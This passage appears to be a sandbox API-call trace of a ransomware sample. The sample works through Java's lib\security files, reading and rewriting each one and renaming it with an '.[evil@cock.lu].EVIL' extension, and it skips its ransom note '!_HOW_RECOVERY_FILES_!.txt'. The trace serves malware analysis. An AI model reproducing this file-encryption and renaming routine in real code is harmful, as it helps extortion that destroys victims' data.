_Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security") returned 0x0 [0098.231] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\*" [0098.231] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0098.232] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.232] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\.") returned 50 [0098.232] wcscmp (_String1=".", _String2=".") returned 0 [0098.232] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.232] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.232] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\..") returned 51 [0098.232] wcscmp (_String1=".", _String2="..") returned -1 [0098.232] wcscmp (_String1="..", _String2="..") returned 0 [0098.232] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.232] wcsstr (_Str="blacklist", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.232] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist") returned 58 [0098.232] wcscmp (_String1="blacklist", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.232] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="blacklist") returned 0x0 [0098.232] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist") returned 0x3a [0098.232] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\blacklist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.234] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfd6, lpOverlapped=0x0) returned 1 [0098.238] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.238] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.238] _errno () returned 0x84b1160840 [0098.238] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.238] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfe0, lpOverlapped=0x0) returned 1 [0098.238] CloseHandle (hObject=0x1a8) returned 1 [0098.238] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.239] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.239] __uncaught_exception () returned 0x84b1160800 [0098.239] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.239] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\blacklist"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\blacklist.[evil@cock.lu].evil")) returned 1 [0098.240] ??_V@YAXPEAX@Z () returned 0x1 [0098.242] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklist", dwFileAttributes=0x0) returned 0 [0098.242] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.242] wcsstr (_Str="blacklisted.certs", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.242] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs") returned 66 [0098.242] wcscmp (_String1="blacklisted.certs", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.243] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="blacklisted.certs") returned 0x0 [0098.243] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs") returned 0x42 [0098.243] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.244] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e5, lpOverlapped=0x0) returned 1 [0098.249] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.249] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.249] _errno () returned 0x84b1160840 [0098.249] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.250] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x500, lpOverlapped=0x0) returned 1 [0098.250] CloseHandle (hObject=0x1a8) returned 1 [0098.250] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.250] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.250] __uncaught_exception () returned 0x84b1160800 [0098.250] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.250] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\blacklisted.certs"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\blacklisted.certs.[evil@cock.lu].evil")) returned 1 [0098.251] ??_V@YAXPEAX@Z () returned 0x1 [0098.254] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\blacklisted.certs", dwFileAttributes=0x0) returned 0 [0098.255] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.255] wcsstr (_Str="cacerts", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.255] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts") returned 56 [0098.255] wcscmp (_String1="cacerts", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.255] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="cacerts") returned 0x0 [0098.255] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts") returned 0x38 [0098.255] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\cacerts"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.257] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bb4c, lpOverlapped=0x0) returned 1 [0098.280] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.280] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.280] _errno () returned 0x84b1160840 [0098.280] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.280] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1bb60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bb60, lpOverlapped=0x0) returned 1 [0098.280] CloseHandle (hObject=0x1a8) returned 1 [0098.281] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.281] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.281] __uncaught_exception () returned 0x84b1160800 [0098.281] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.281] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\cacerts"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\cacerts.[evil@cock.lu].evil")) returned 1 [0098.282] ??_V@YAXPEAX@Z () returned 0x1 [0098.284] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\cacerts", dwFileAttributes=0x0) returned 0 [0098.285] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.285] wcsstr (_Str="java.policy", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.285] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy") returned 60 [0098.285] wcscmp (_String1="java.policy", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.285] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="java.policy") returned 0x0 [0098.285] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy") returned 0x3c [0098.285] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\java.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.286] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9a2, lpOverlapped=0x0) returned 1 [0098.291] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.291] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.291] _errno () returned 0x84b1160840 [0098.291] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.291] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0, lpOverlapped=0x0) returned 1 [0098.291] CloseHandle (hObject=0x1a8) returned 1 [0098.291] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.291] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.291] __uncaught_exception () returned 0x84b1160800 [0098.291] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\java.policy"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\java.policy.[evil@cock.lu].evil")) returned 1 [0098.292] ??_V@YAXPEAX@Z () returned 0x1 [0098.294] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.policy", dwFileAttributes=0x0) returned 0 [0098.295] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.295] wcsstr (_Str="java.security", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.295] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security") returned 62 [0098.295] wcscmp (_String1="java.security", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.295] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="java.security") returned 0x0 [0098.295] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security") returned 0x3e [0098.295] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\java.security"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.296] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8606, lpOverlapped=0x0) returned 1 [0098.303] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.303] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.303] _errno () returned 0x84b1160840 [0098.303] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.303] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x8620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8620, lpOverlapped=0x0) returned 1 [0098.303] CloseHandle (hObject=0x1a8) returned 1 [0098.303] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.303] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.303] __uncaught_exception () returned 0x84b1160800 [0098.303] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.303] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\java.security"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\java.security.[evil@cock.lu].evil")) returned 1 [0098.304] ??_V@YAXPEAX@Z () returned 0x1 [0098.306] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\java.security", dwFileAttributes=0x0) returned 0 [0098.307] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.307] wcsstr (_Str="javaws.policy", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.307] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy") returned 62 [0098.307] wcscmp (_String1="javaws.policy", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.307] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javaws.policy") returned 0x0 [0098.307] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy") returned 0x3e [0098.307] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\javaws.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.308] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x62, lpOverlapped=0x0) returned 1 [0098.314] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.314] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.315] _errno () returned 0x84b1160840 [0098.315] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.315] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x80, lpOverlapped=0x0) returned 1 [0098.315] CloseHandle (hObject=0x1a8) returned 1 [0098.315] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.315] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.315] __uncaught_exception () returned 0x84b1160800 [0098.315] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.374] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\javaws.policy"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\javaws.policy.[evil@cock.lu].evil")) returned 1 [0098.375] ??_V@YAXPEAX@Z () returned 0x1 [0098.378] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\javaws.policy", dwFileAttributes=0x0) returned 0 [0098.378] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.378] wcsstr (_Str="local_policy.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.378] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar") returned 65 [0098.378] wcscmp (_String1="local_policy.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.378] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="local_policy.jar") returned 0x0 [0098.378] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar") returned 0x41 [0098.378] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\local_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.380] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdc7, lpOverlapped=0x0) returned 1 [0098.382] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.383] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.383] _errno () returned 0x84b1160840 [0098.383] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.383] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xde0, lpOverlapped=0x0) returned 1 [0098.383] CloseHandle (hObject=0x1a8) returned 1 [0098.383] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.383] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.383] __uncaught_exception () returned 0x84b1160800 [0098.383] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.383] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\local_policy.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\local_policy.jar.[evil@cock.lu].evil")) returned 1 [0098.384] ??_V@YAXPEAX@Z () returned 0x1 [0098.387] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\local_policy.jar", dwFileAttributes=0x0) returned 0 [0098.387] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.387] wcsstr (_Str="trusted.libraries", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.387] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\trusted.libraries") returned 66 [0098.387] wcscmp (_String1="trusted.libraries", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.387] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="trusted.libraries") returned 0x0 [0098.387] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\trusted.libraries") returned 0x42 [0098.387] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\trusted.libraries"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.388] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x0, lpOverlapped=0x0) returned 1 [0098.392] CloseHandle (hObject=0x1a8) returned 1 [0098.392] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\trusted.libraries"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\trusted.libraries.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\trusted.libraries.[evil@cock.lu].evil")) returned 1 [0098.393] ??_V@YAXPEAX@Z () returned 0x1 [0098.395] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\trusted.libraries", dwFileAttributes=0x0) returned 0 [0098.396] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0098.396] wcsstr (_Str="US_export_policy.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.396] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar") returned 69 [0098.396] wcscmp (_String1="US_export_policy.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.396] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="US_export_policy.jar") returned 0x0 [0098.396] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar") returned 0x45 [0098.396] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0098.397] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, 